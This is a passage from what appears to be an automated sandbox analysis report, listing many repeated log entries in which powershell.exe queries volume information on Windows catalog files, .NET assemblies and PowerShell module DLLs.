Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
